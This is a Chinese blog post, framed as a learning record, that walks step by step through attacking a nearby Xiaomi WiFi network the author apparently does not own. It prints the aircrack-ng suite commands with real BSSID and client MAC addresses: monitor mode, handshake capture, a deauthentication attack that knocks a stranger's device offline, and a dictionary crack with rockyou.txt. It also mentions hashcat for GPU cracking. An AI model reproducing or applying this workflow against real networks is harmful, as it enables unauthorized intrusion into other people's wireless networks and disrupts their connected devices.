WiFi爆破学习记录

VSole2021-08-12 23:11:00

前言:

看着附近的WIFI,灵机一动,上网搜索了一下教程于是决定做一个试验。在此记录一下试验过程和结果,仅作为学习记录。

试验环境:

台式机
Kali虚拟机
无线网卡
菜鸡一只

试验过程:

一、无线网卡安排

  1. 主机USB接口直接怼入无线网卡,Kali虚拟机弹窗提示,选择连接到虚拟机,选中Kali,点击确定。看到有些教程说需要安装驱动,这可能跟所购买的无线网卡是否免驱有关,我这里是免驱版的直接怼入即可使用。

2.1.此时在Kali的网络连接处就可以看到,虚拟机可以搜索到附近的WIFI。说明网卡怼入成功。


2.2.打开终端输入ifconfig查看网卡,存在wlan0。也说明网卡怼入成功。

2.3.终端输入iwconfig,存在网卡wlan0,也说明网卡怼入成功。


2.4.虚拟机检查可移动设备,可以清楚的看到无线网卡的型号。也是说明网卡怼入成功。

二、握手包抓取

1.1.输入命令,清除系统中可能影响监听的进程:

airmon-ng check kall

1.2.开启网卡监听:

airmon-ng start wlan0

1.3.检查是否成功开启监听:(可以看到wlan0变成了wlan0mon,说明成功开启监听模式)

iwconfig

2.开始探测附近的WIFI:

airodump-ng wlan0mon

主要看三个参数:

BSSID:路由器的MAC地址
PWR:信号值,绝对值越低,说明信号越强
CH:当前路由器使用的信道

3.找一个信号比较强的WIFI进行监听,这里选择了一个小米的WIFI,BSSID为:64:64:4A:E3:90:41,使用的信道为1,输入命令,开始监听:

airodump-ng --bssid 64:64:4A:E3:90:41 -c 1 -w test wlan0mon

参数说明:

–bssid:路由器的MAC地址
-c:路由器使用的信道
-w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录

(下图说明:BSSID为路由器MAC地址,STATION为当前连接在路由器上的设备的MAC地址)

4.另外再打开一个终端,对当前正在连接的某个设备进行攻击,使其断开与路由器的连接。(原理没有深究,大概使向目标发送大量数据,或者类似于ARP欺骗的攻击,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包。)

aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon
或者 aireplay-ng --deauth 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon

参数说明:

-0、–deauth:指定对目标进行攻击的次数
-a:路由器的MAC地址
-c:目标MAC地址

5.等待攻击完成,此时在第一个终端会显示握手包抓取成功,如下图:

6.在根目录生成有一些握手包文件,其中包含test-01.cap


三、爆破开启

1.在终端输入命令:

aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap

参数说明:

-w:指定一个密码文件,这里使用的是Kali自带的密码文件,可以在文件系统中找到。

(PS:我一开始使用此命令时报错,缺少-w参数,然后进入密码存放文件路径中发现,自带的密码是一个压缩包,需要先解压才能用,源文件为:rockyou.txt.gz。后面的.cap文件,如果一开始更改的存放的位置需要加上完整的路径)

试验结果:

等待爆破结束:(很遗憾,密码字典不够强大,没有爆破出来,密码正确会显示在终端)

个人总结:

感觉就是学习了一个工具的大概使用过程,aircrack-ng原理是使用CPU去跑包,全程不需要联网,破解速度看个人CPU的性能。

此间还看到了一个利用显卡GPU去跑字典的教程,前期一样的是抓取握手包,然后使用hashcat这个工具进行爆破,据说速度比aircrack-ng快的多。还有一些其他的工具,如:EWSA(与hashcat原理差不多)

(一样做了试验,但是hashcat没跑起来,原因是:我的电脑显卡是集成显卡,太垃圾了。需要独立显卡才可以跑)

(PS:穷举爆破这种事,关键还是字典和目标密码强度,个人脸黑,看来得自己尽快搞个WIFI了)

虚拟机路由
本作品采用《CC 协议》,转载必须注明作者和本文链接
为了应对传统数据中心网络对服务器虚拟化技术的限制,VXLAN技术应运而生。
换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一跳路由器不出故障。终端主机将它们各自的数据包转发到该虚拟路由器上。HSRP 运行在 UDP 上,采用端口号1985。优先级低的另外一台处于hot standby/backup状态,不做数据包转发。VRRP组号VRRP协议的路由交换只有一种广播消息:advertisement通告消息:发送者只能是master,默认每1s发送一个通告消息。
路由,故名思意就是通过软件来实现路由功能的设备。而软路由不管是软件还是硬件,都是通用的,而不是专用的,这就是他们最大的区别。软路由你可以认为,就是一个带有多个网口的微型服务器。因为大部分软路由在无线方面表现并不怎么样,软路由目前最大的优势还是性能比较强。超过千兆的可以自行选择2.5G网口,或者光口的x86软路由产品。我的建议是,目前软路由更适合安装比较轻量的,主要用于网络的一些软件。
怎么更好的解释网络的路由模式和桥接模式?在数据转发过程中,存在路由模式和桥接模式,这2种模式的定义是什么,实
NSX-t交换路由
2022-12-28 10:33:59
但是,ip报文中,使用的却是“ip:mac”地址,因此可以推测,ip地址与交换机之间存在映射,先锁定一个较大的范围,mac地址与端口号之间存在映射,进一步锁定精确位置。
主要的环境准备参见上一篇文章,这里介绍本篇文章中会用的的模拟工具以及另一个静态分析工具。
本环境为黑盒测试,在不提供虚拟机帐号密码的情况下进行黑盒测试拿到域控里面的flag。
WPA/WPA2:WPA/WPA2是一种比WEP强壮的加密算法,挑选这种安全类型,路由器将选用Radius服务器进行身份认证并得到密钥的WPA或WPA2安全形式。默许选项为主动,挑选该项后,路由器将依据实践需求主动挑选TKIP或AES加密办法。留意11N形式不支持TKIP算法。
据telecompaper网2月2日报道,Trellix今天宣布发现了两个影响一系列思科网络设备的重要漏洞,其中一个漏洞可能构成潜在的硬件供应链风险。研究人员指出,CVE-2023-20076漏洞可能允许攻击者几乎完全控制受影响设备的操作系统,并允许管理员直接在设备上部署应用进程容器或虚拟机。此命令注入可以绕过思科通过重启和系统重置实施的防御措施。
VSole
网络安全专家